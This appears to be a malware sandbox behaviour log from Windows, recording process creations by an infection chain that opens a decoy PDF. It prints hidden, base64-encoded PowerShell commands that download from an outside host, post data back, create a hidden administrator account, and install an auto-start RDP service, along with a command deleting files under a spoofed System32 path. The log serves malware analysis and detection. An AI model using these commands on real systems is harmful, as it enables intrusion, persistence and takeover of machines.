        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
